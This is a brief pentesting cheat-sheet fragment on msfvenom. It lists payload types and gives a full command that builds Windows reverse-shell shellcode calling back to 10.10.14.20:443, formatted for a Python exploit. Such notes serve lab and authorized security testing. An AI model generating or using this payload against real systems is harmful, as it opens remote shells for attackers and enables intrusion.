Last updated 1 year ago
msfvenom --l all | grep <Payload>
Staged payloads
Stageless payloads
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.20 LPORT=443 -b '\x00\x0A\x0D' -f python -v payload